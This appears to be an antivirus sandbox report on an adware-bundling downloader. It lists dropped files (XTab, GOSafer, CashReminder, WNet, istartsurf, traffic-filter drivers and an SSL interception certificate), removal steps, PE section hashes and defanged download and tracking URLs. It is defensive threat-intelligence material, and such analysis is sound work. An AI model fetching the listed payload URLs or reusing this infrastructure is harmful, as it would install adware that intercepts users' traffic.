%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\top-line[1].gif (1 bytes)
%Program Files%\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files%\XTab\searchProvider.xml (8 bytes)
%Program Files%\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files%\XTab\web\ver.txt (47 bytes)
%Program Files%\XTab\web\img\icon128.png (9 bytes)
%Program Files%\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files%\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files%\XTab\skin\input_bk.png (2 bytes)
%Program Files%\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files%\XTab\CmdShell.exe (1685 bytes)
%Program Files%\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files%\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files%\XTab\skin\logo.png (5 bytes)
%Program Files%\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files%\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files%\XTab\web\js\common.js (2 bytes)
%Program Files%\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files%\XTab\skin\conf.xml (8 bytes)
%Program Files%\XTab\skin\btn.png (2 bytes)
%Program Files%\XTab\skin\conf_back.png (1623 bytes)
%Program Files%\XTab\web\js\library.js (4216 bytes)
%Program Files%\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files%\XTab\install.data (93 bytes)
%Program Files%\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files%\XTab\uninstall.exe (1343 bytes)
%Program Files%\XTab\web\img\google_trends.png (7 bytes)
%Program Files%\XTab\web\data.html (20 bytes)
%Program Files%\XTab\IeWatchDog.dll (20 bytes)
%Program Files%\XTab\skin\radio_2.png (3 bytes)
%Program Files%\XTab\web\js\ga.js (1568 bytes)
%Program Files%\XTab\ffsearch_toolbar!1.0.0.1028.xpi (15 bytes)
%Program Files%\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files%\XTab\web\js\xagainit2.0.js (4 bytes)
%Program Files%\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files%\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files%\XTab\skin\radio_1.png (3 bytes)
%Program Files%\XTab\msvcp110.dll (16990 bytes)
%Program Files%\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files%\XTab\web\indexIE.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp\System.dll (11 bytes)
%Program Files%\XTab\web\indexIE8.html (1794 bytes)
%Program Files%\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files%\XTab\web\img\icon48.png (3 bytes)
%Program Files%\XTab\skin\close.png (3 bytes)
%Program Files%\XTab\skin\about.png (4 bytes)
%Program Files%\XTab\web\js\js.js (18 bytes)
%Program Files%\XTab\skin\settings.png (5 bytes)
%Program Files%\XTab\web\img\icon16.png (628 bytes)
%Program Files%\XTab\skin\about_bk.png (1436 bytes)
%Program Files%\XTab\SupTab.dll (15406 bytes)
%Program Files%\XTab\web\js\xagainit-ie8.js (4 bytes)
%Program Files%\XTab\msvcr110.dll (21280 bytes)
%Program Files%\XTab\ProtectService.exe (5309 bytes)
%Program Files%\XTab\skin\main.xml (4 bytes)
%Program Files%\XTab\web\main.css (19 bytes)
%Program Files%\XTab\HPNotify.exe (17941 bytes)
%Program Files%\XTab\conf (1694 bytes)
%Program Files%\XTab\web\img\loading.gif (5 bytes)
%Program Files%\XTab\skin\btn_apply.png (6 bytes)
%Program Files%\XTab\web\img\logo32.ico (4 bytes)
%Program Files%\XTab\BrowserAction.dll (33992 bytes)
%Program Files%\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files%\XTab\BrowerWatchFF.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\GOSafer\nfregdrv.exe (1552 bytes)
%Program Files%\GOSafer\gosafer.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg17.tmp (66910 bytes)
%System%\drivers\gosaferdrv.sys (55 bytes)
%Program Files%\GOSafer\uninst.exe (1793 bytes)
%Program Files%\GOSafer\ProtocolFilters.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SelfDel.dll (5 bytes)
%Program Files%\GOSafer\libeay32.dll (35507 bytes)
%Program Files%\GOSafer\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\System.dll (11 bytes)
%Program Files%\GOSafer\nfapi.dll (4992 bytes)
%Program Files%\GOSafer\gosaferdrv.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (3566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WebDataJs (40 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bg1.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\Thumbs.db (27 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe (14022 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\uninstallDlg2.xml (15 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code1.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_light.png (139 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code4.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\479.json (512 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (993 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code5.jpg (4 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code3.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bk_shadow.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\Thumbs.db (42 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\MessageBox.xml (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\button1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_bg.png (159 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\scrollbar.bmp (37 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checked.png (222 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox_select.png (783 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\unchecked.png (135 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code6.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\close.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code2.jpg (4 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\min.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox.png (545 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\button.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bg.png (673 bytes)
%Program Files%\CashReminder\ssleay32.dll (12088 bytes)
%Program Files%\CashReminder\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\System.dll (11 bytes)
%System%\drivers\crfilterdrv.sys (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp (67341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\CashReminder\libeay32.dll (35507 bytes)
%Program Files%\CashReminder\uninstall.exe (1568 bytes)
%Program Files%\CashReminder\nfregdrv.exe (1552 bytes)
%Program Files%\CashReminder\CashReminder.exe (15536 bytes)
%Program Files%\CashReminder\crfilterdrv.sys (1856 bytes)
%Program Files%\CashReminder\ProtocolFilters.dll (9320 bytes)
%WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.cer (782 bytes)
%WinDir%\Temp\P_RuleList.txt (180 bytes)
%WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.pvk (1 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\rules[1].txt (180 bytes)
%Program Files%\WNet\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SelfDel.dll (5 bytes)
%Program Files%\WNet\WNet.exe (15168 bytes)
%Program Files%\WNet\uninst.exe (1720 bytes)
%Program Files%\WNet\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyF.tmp (68079 bytes)
%System%\drivers\ssfilterdrv.sys (55 bytes)
%Program Files%\WNet\ProtocolFilters.dll (9320 bytes)
%Program Files%\WNet\nfapi.dll (4992 bytes)
%Program Files%\WNet\libeay32.dll (35507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\System.dll (11 bytes)
%Program Files%\WNet\ssfilterdrv.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\index[1].htm (2203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\amipb[1].js (34728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_br[1].exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_am2[1].exe (20504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_cr[1] (64392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\nsWeb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_gs[1] (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\s9[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe (110758 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\310714_is[1] (44832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe (20504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_a9[1].exe (32816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe (32816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (3526 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\310714_is.exe (44832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].php (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\240714_ps[1].exe (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\291014_nj[1].exe (110758 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_mb[1] (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe (64392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\min.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\one.zip (127551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\DataBase (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\close.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowser.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\1[1].zip (229748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checked.png (222 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\RegWrite.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\2[1].zip (325830 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\479.json (512 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\conf (79 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\two.zip (255743 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowserFrame.dll (3616 bytes)
%WinDir%\Temp\CashReminder\mfs1A.tmp (408297 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\stores[1].htm (687 bytes)
%WinDir%\Temp\P_StoreList.txt (687 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[1].txt (265 bytes)
%WinDir%\Temp\G_CheckUpdate.txt (8 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[2].txt (16 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\update[1].htm (8 bytes)
%WinDir%\Temp\G_RuleList.txt (16 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\rules[1].txt (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5M11A.tmp\310714_is.tmp (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awhC.tmp (171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awhD.tmp (149648 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright: q2g54WndLShXYB3BIA5JVf
Legal Trademarks:
Original Filename: q2g54WndLShXYB3BIA5J
Internal Name:
File Version: 7.8.5.9
File Description: Download da Internet
Comments: q2g54WndLShXYB3B
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23130 | 23552 | 4.44841 | 0bc2ffd32265a08d72b795b18265828d |
.rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
.data | 36864 | 110488 | 1024 | 3.26405 | 975304d6dd6c4a4f076b15511e2bbbc0 |
.ndata | 147456 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 188416 | 3192 | 3584 | 2.80742 | 08b8765ebae57a11c951f075e7900c43 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 184
3e3cd94c5e6d1f1c66683d7bc29aaef7
fd798e8d7d88dc163e681f81144854ea
3330fd55d29f0d1fd88c36931d7e94b6
98dfb01f27d0d00488f3347c7bb0ef36
c6e528a31cafb6b2d33443512b8efc1f
c58fc13ddf9b7a2e8ca99386b9eb6c8f
e4c4cff1094fbff72aeb3e6827f69bc4
7241dc3f2a0b6ea61f4df85d751d7c03
f83816c5fd74f87663c27bc857c54c20
123d3a4485c9649b9f9ee387279725fa
2a2056e64caf8b79177ee628e97db231
641edaabefd4f46a0dc8caa8dae297cd
4363940d7485ca19ff5177e8c83389cc
173ab471842f45ba225c672a966fdfcc
7fe602114a76666ea973a5a22b4bceb7
55f6941611e6b5b5afe7a70dbb1b8bdb
ffe87a74a9ce198b2266dd8fdd67a3a3
5623ca722006ab792b8de36f6d6633ea
415ec116714b68e2101e52ee23129617
3156d35e3cfe3cd058e14cf42ec326eb
aac8203e17f1ba0429eb68f05f00ef5d
a8647af5a88fc0c6cfcf258906f302f4
2bec18f54db5c51eac6e210dba1ff40b
2143cb5872145360aa68b92bd7951843
5e0826607d791fed6050acb832441c67
Network Activity
URLs
URL | IP |
---|---|
hxxp://198.50.209.4/registro/icone_cadeado.gif | |
hxxp://198.50.209.4/registro/top-line.gif | |
hxxp://www.nowtake.me/8Hk4o | |
hxxp://www.nowtake.me/010914s/010914i.htm | |
hxxp://www.nowtake.me/010914s/verificar_ip.php | |
hxxp://t1.extreme-dm.com/i.gif | |
hxxp://www.nowtake.me/310714d/240714_ps.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://t1.extreme-dm.com/s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://www.4threquest.me/registro/310113f8.htm | |
hxxp://mobimidia.com/mobile/MobiMidia_validation.js | |
hxxp://mobimidia.com/mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA= | |
hxxp://mobimidia.com/mobile/mt-core.js | |
hxxp://www.nowtake.me/310714d/310714_a9.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://www.nowtake.me/310714d/310714_am2.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://www.nowtake.me/310714d/310714_br.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en | |
hxxp://www.tjepgz.cc/3517/1 | |
hxxp://www.tjepgz.cc/files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/namen.php | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/tdownload.php | |
hxxp://www.nowtake.me/310714d/291014_nj.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://www.nowtake.me/registro/carregando.gif | |
hxxp://plainsavingscenter.com/mg?alpha=HyZPRnotGAhqT14bYGx1HmIcS3ofYE03fWFKOXdhHXUOIX0+L1I0EmhiTjJaMDJXZwQZUlU2MQZRaxkdDC51SwhncVMJcU8OQzZrVi9y | |
hxxp://www.nowtake.me/310714d/310714_gs.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://related.deals/services/stores?dummy=526 | |
hxxp://related.deals/services/rules?dummy=212 | |
hxxp://related.deals/services/update/1.0.0/iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL/120 | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.dlzip1.istartsurf.finish,9 | |
hxxp://plainsavingscenter.com/fp?alpha=UHAKO1kqRR0MZFxoJRFWUTRZNllQLBxKGHdxWy8GFiAEb0pGWwdKP1BGZToMDnt+bFElG2A/bkprKRY8VzgCOSk8BjouWnBZH08abykoWDgPbRFvGER0QkZRIhoKekJQIFMwXQwKCkk3WjsQPBUNbg9vI1cCYToaUXdbZ01DdzVlIlgPD3YdVDEZOBwoJGxSXQJuWXoCF2ULRklwHhhwQUtwUz1YVxwLRCdTOwZsDBxlWX52WRZnOQ0eK1YHFwpwKGJnLhYddAdfc0BhW3UlP0UndhgaOEcSeF1HWCceDnlHQHAVcVFrQBwIcgtmGz99C2ALGiBWGxA4HD1rUmM5VTgHPitMb0kuXghdGD16X3l/VWUORzlZXjw= | |
hxxp://goo.gl/Bw14Po | |
hxxp://plainsavingscenter.com/ii?alpha=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 | |
hxxp://plainsavingscenter.com/if?alpha=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 | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php | |
hxxp://dyno3mlj15jgv.cloudfront.net/V19/amipb.js | |
hxxp://log.very911.com/install.gif?bundle=istartsurf&ptid=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001 | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.regok | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.hp | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.finish | |
hxxp://www.tjepgz.cc/3517/2 | |
hxxp://www.tjepgz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip | |
hxxp://brsoftwarellc.com/services/rules.txt?dummy=504 | |
hxxp://brsoftwarellc.com/services/update.php?v=1.0.0&key=ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB&dummy=153 | |
hxxp://www.gosaferllc.com/services/rules.txt?dummy=534 | |
hxxp://www.gosaferllc.com/services/update.php?v=1.0.0&key=DjgSrxXMrVZd5ZDoXibWfcZQfB0nLdzw&dummy=112 | |
hxxp://www.ninjasoftwarellc.com/services/rules.txt?dummy=243 | |
hxxp://www.ninjasoftwarellc.com/services/update.php?v=1.2.0&key=FVz40gdklAiQUMMUD3ARa8NDKI9Pp0VX&dummy=708 | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.wpm | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.ient | |
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.RegWrite | |
hxxp://xa.xingcloud.com/v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm | |
hxxp://xa.xingcloud.com/v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=install.pcm | |
hxxp://xa.xingcloud.com/v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action1=visit&action2=install | |
hxxp://xa.xingcloud.com/v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2105 | |
